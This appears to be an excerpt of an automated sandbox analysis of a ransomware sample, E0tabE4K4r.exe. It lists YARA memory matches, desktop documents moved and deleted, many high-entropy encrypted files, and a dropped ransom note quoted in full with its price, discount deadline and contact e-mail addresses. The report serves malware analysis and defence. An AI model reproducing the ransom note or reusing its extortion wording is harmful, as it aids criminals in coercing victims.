          Source: Yara matchFile source: 13.2.E0tabE4K4r.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 19.2.E0tabE4K4r.exe.22c15a0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.E0tabE4K4r.exe.22715a0.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.E0tabE4K4r.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.E0tabE4K4r.exe.22815a0.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.1281381535.0000000002280000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.1396247343.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.2485636228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.1490001313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.1480789200.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1229908014.0000000002270000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.1406738224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.1259313771.0000000002230000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: E0tabE4K4r.exe PID: 6708, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: E0tabE4K4r.exe PID: 412, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: E0tabE4K4r.exe PID: 5172, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: E0tabE4K4r.exe PID: 6744, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: E0tabE4K4r.exe PID: 5296, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: E0tabE4K4r.exe PID: 7304, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: E0tabE4K4r.exe PID: 7580, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: E0tabE4K4r.exe PID: 7636, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: E0tabE4K4r.exe PID: 7868, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: E0tabE4K4r.exe PID: 7888, type: MEMORYSTR
          Modifies existing user documents (likely ransomware behavior)
          Source: C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exeFile moved: C:\Users\user\Desktop\TQDGENUHWP.pdfJump to behavior
          Source: C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exeFile deleted: C:\Users\user\Desktop\TQDGENUHWP.pdfJump to behavior
          Source: C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exeFile moved: C:\Users\user\Desktop\UQMPCTZARJ.xlsxJump to behavior
          Source: C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exeFile deleted: C:\Users\user\Desktop\UQMPCTZARJ.xlsxJump to behavior
          Source: C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exeFile moved: C:\Users\user\Desktop\MQAWXUYAIK.xlsxJump to behavior
          Writes a notice file (html or txt) to demand a ransom
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{7e55edb2-3bb3-4a5d-8e3d-f1e5ade866d8}\appsglobals.txt -> decrypter\dvddecrypter.exe12438{6d809377-6af0-444b-8957-a3773f02200e}\renderdoc\qrenderdoc.exe12438{6d809377-6af0-444b-8957-a3773f02200e}\microsoft system center 2012 r2\service manager\microsoft.enterprisemanagement.servicemanager.ui.console.exe12438microsoft.appv.603b45325cf2a147a217bc0826e85cce12439{7c5a40ef-a0fb-4bfc-874a-c0f2e0b9fa8e}\pro evolution soccer 2018\pes2018.exe12439c:\ignition\ignitioncasino.exe12440{7c5a40ef-a0fb-4bfc-874a-c0f2e0b9fa8e}\splashdata\splashid safe\splashid safe.exe12440{6d809377-6af0-444b-8957-a3773f02200e}\native instruments\komplete kontrol\komplete kontrol.exe1244025342asdf3333.stoppuhrtimer_1xbryz0n7krfa!app12441{6d809377-6af0-444b-8957-a3773f02200e}\owasp\zed attack proxy\zap.exe12441{6d809377-6af0-444b-8957-a3773f02200e}\dell\toad for oracle 2015 r2 suite\toad for oracle 12.8\toad.exe12441{7c5a40ef-a0fb-4bfc-874a-c0f2e0b9fa8e}\mysql\mysql workbench 6.0 ce\mysqlworkbench.exe12441212377tik.7tik-tiktokforwindows_da70t93mgq52j!app12442{7cJump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{44257e36-ae79-46be-a539-cf0cb39c677f}\0.0.filtertrie.intermediate.txt -> decryption settings~decrease zoom level~decrease volume~decrease mouse speed~decrease mouse acceleration~decrease brightness~decode~decice~deault~deaf~deafult~ddevice~daylight saving time on or off~davice~dates~date time~date settings~date and time~date and time settings~date and time from a time server~date and time formats~data~data you send to microsoft~data viewer~data usage overview~data to improve narrator~data systemwide~data settings~data sense~data saver~data restore~data plan~data limit~data instead of wifi~data for all apps~data connection with other devices~data captured by windows mixed reality~dark~darker touch feedback~dark theme~dark theme settings~dark mode systemwide~dark mode settings~dark mode for apps~dark colours~dark colors~dafault~c~cutting and pasting~cut and paste~customizing~customize~customize narrator sounds setting~customize narrator sound effects setting~customising~custJump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{260db108-6b4d-4d40-b3dd-4a5b75ca2ebe}\0.0.filtertrie.intermediate.txt -> decryption settings~decrease zoom level~decrease volume~decrease mouse speed~decrease mouse acceleration~decrease brightness~decode~decice~deault~deaf~deafult~ddevice~daylight saving time on or off~davice~dates~date time~date settings~date and time~date and time settings~date and time from a time server~date and time formats~data~data you send to microsoft~data viewer~data usage overview~data to improve narrator~data systemwide~data settings~data sense~data saver~data restore~data plan~data limit~data instead of wifi~data for all apps~data connection with other devices~data captured by windows mixed reality~dark~darker touch feedback~dark theme~dark theme settings~dark mode systemwide~dark mode settings~dark mode for apps~dark colours~dark colors~dafault~c~cutting and pasting~cut and paste~customizing~customize~customize narrator sounds setting~customize narrator sound effects setting~customising~custJump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt -> decryption settings;change encryption settings"}},{"system.parsingname":{"type":12,"value":"aaa_settingspagedevices.settingcontent-ms"},"system.setting.fontfamily":{"type":12,"value":"segoe mdl2 assets"},"system.setting.glyph":{"type":12,"value":""},"system.setting.pageid":{"type":12,"value":"settingspagedevices"},"system.comment":{"type":12,"value":"bluetooth and other devices settings"},"system.highkeywords":{"type":12,"value":"device;projector;projectors;pair bluetooth device;unpair device;pair device;bluetooth settings;add bluetooth device;add device"}},{"system.parsingname":{"type":12,"value":"aaa_settingspagedevicespen-2.settingcontent-ms"},"system.setting.fontfamily":{"type":12,"value":"segoe mdl2 assets"},"system.setting.glyph":{"type":12,"value":""},"system.setting.pageid":{"type":12,"value":"settingspagedevicespen"},"system.comment":{"type":12,"value":"pen and windows ink settings"},"system.highkeywords":{"type":12,"value":"pens;handedness;cursor;cursors;writing;write;workspace;pen shortcuts;hJump to dropped file
          Source: C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exeFile dropped: C:\Users\user\AppData\Local\VirtualStore\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.you can get and look video overview decrypt tool:https://we.tl/t-99mnqxmrdsprice of private key and decrypt software is $1999.discount 50% available if you contact us first 72 hours, that's price for you is $999.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address to contact us:datarestorehelpyou@airmail.ccyour personal id:0840asdwmmsrxmuuxypapzbgoafxd9pczhmw8zvrp7pgjwt1Jump to dropped file
          Source: C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exeFile dropped: C:\Users\user\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.you can get and look video overview decrypt tool:https://we.tl/t-99mnqxmrdsprice of private key and decrypt software is $1999.discount 50% available if you contact us first 72 hours, that's price for you is $999.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address to contact us:datarestorehelpyou@airmail.ccyour personal id:0840asdwmmsrxmuuxypapzbgoafxd9pczhmw8zvrp7pgjwt1Jump to dropped file
          Writes many files with high entropy
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\TXM4PK7R\th[1].png entropy: 7.99202085145Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\PJOIJVPQ\X4wIjRXDbKeGz0mzi-NAovdjKMM.br[1].js entropy: 7.99761045557Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\PJOIJVPQ\th[1].svg entropy: 7.99350230099Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\PJOIJVPQ\th[1].png entropy: 7.99121384659Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\TXM4PK7R\th[3].png entropy: 7.99068954028Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\TXM4PK7R\th[1].svg entropy: 7.99353888172Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{7d211107-64fd-418b-bef3-55d5ac74a5cc}\0.0.filtertrie.intermediate.txt entropy: 7.99522389111Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{326d5ea1-32a9-48c1-a274-b0b6c14dea72}\Apps.ft entropy: 7.99634358098Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{326d5ea1-32a9-48c1-a274-b0b6c14dea72}\0.0.filtertrie.intermediate.txt entropy: 7.99469411659Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\TXM4PK7R\X6j0qPgNij1n_IogMJrgYaT9Kp8[1].js entropy: 7.99173997778Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{7d211107-64fd-418b-bef3-55d5ac74a5cc}\Apps.ft entropy: 7.99614690766Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{ae68f974-166e-4f91-b176-9782057fd3db}\Apps.ft entropy: 7.99586622421Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{ae68f974-166e-4f91-b176-9782057fd3db}\0.0.filtertrie.intermediate.txt entropy: 7.99553003477Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{7e55edb2-3bb3-4a5d-8e3d-f1e5ade866d8}\settingssynonyms.txt entropy: 7.9982957986Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{7e55edb2-3bb3-4a5d-8e3d-f1e5ade866d8}\settingsglobals.txt entropy: 7.99654580218Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440007v3.xml entropy: 7.9963050035Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440002v9.xml entropy: 7.99539593318Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\-U2ww19iycr3M_DiD25JdVUDdqk.br[1].js entropy: 7.99791409342Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\aABLNT_FV45QjYQfnRHrBCAk4GU[1].js entropy: 7.99828226155Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\5_KhThI0onehz_-3sl58j0dOeLI.br[1].js entropy: 7.99847826242Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\584482RVjBIoEvVSe0RsuS1I4YQ.br[1].js entropy: 7.99510731534Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\DccpWCpoNzCwM4Qymi_Ji67Ilso.br[1].js entropy: 7.99859684741Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\D3DSCache\f4d41c5d09ae781\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx entropy: 7.99694761143Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt entropy: 7.99355912836Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install_2023-10-05_105641_23a4-23a8.log entropy: 7.99417467817Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin entropy: 7.9975412872Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\first_party_sets.db entropy: 7.99657421963Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\MSIMGSIZ.DAT entropy: 7.99622046004Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db entropy: 7.99214334508Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officec2rclient.exe.db entropy: 7.99111227649Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db entropy: 7.99308273453Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officesetup.exe.db entropy: 7.99158865855Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.jfm entropy: 7.99016364716Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\MSIMGSIZ.DAT entropy: 7.99657332695Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409770142418990.txt entropy: 7.99841828591Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409770108031868.txt entropy: 7.99851318966Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409769948369965.txt entropy: 7.99816287935Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409769902033656.txt entropy: 7.9984024596Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409769661005548.txt entropy: 7.99850023173Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409770163025792.txt entropy: 7.99800055665Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\EYNLM9RfkEXFtD8WH1unvJjwzGA.br[1].js entropy: 7.99004112628Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\Init[1].htm entropy: 7.99856642279Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\N1a_FY8_9YTjAb9nKlOpaAAvPEs.br[1].js entropy: 7.99001402873Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\MgSq5EEOyYvlI1qVlLOXfgRHmzM.br[1].js entropy: 7.99852175092Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\mb8fkd60iW7q4wvyDIlCm9OOn10.br[1].js entropy: 7.99580111491Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\pqKAmz-4RXsuUf_YO-8_wQDepUQ.br[1].js entropy: 7.99510186903Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\onra7PQl9o5bYT2lASI1BE4DDEs[1].css entropy: 7.99712889826Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\xIW3D5oXL8xIpGjHoiGVJS_B4mg.br[1].js entropy: 7.99682721913Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\tIa_X3QDXj2Izj2HpQ_Mo9f1WiM.br[1].js entropy: 7.99842128375Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\datareporting\archived\2023-10\1696503513624.2fefa2f4-1344-4424-9531-b97121e6ea8b.main.jsonlz4 entropy: 7.99008526734Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\yNwdh0ra_6sDoSuCVMI8Wjl58UM.br[1].js entropy: 7.99802376032Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\YfXD9vOw8__a60l-k1HNCxSbem4.br[1].js entropy: 7.9969247834Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\eventpage_bin_prod.js entropy: 7.99793979119Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-checkout-eligible-sites-pre-stable.json entropy: 7.99879327944Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\super_coupon.json entropy: 7.99092708112Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite entropy: 7.99562507278Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shm entropy: 7.99419722247Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite entropy: 7.99656029848Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shm entropy: 7.99448995687Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite entropy: 7.99593477673Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shm entropy: 7.99371457912Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite entropy: 7.99602912989Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\EWLSADU7\www.bing[1].xml entropy: 7.99635263896Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-tokenization-config.json entropy: 7.99062124311Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409770577178942.txt entropy: 7.9983144295Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409770440715848.txt entropy: 7.99817380291Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\flapper.gif entropy: 7.99746939423Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shm entropy: 7.99500744191Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shm entropy: 7.99429079743Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite entropy: 7.99675275029Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shm entropy: 7.99510050149Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409775915610935.txt entropy: 7.99847046753Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409775861676833.txt entropy: 7.99860462084Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409775339876828.txt entropy: 7.9983535742Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\256.png entropy: 7.99027150008Jump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409775200518165.txt entropy: 7.99840060359Jump to dropped file
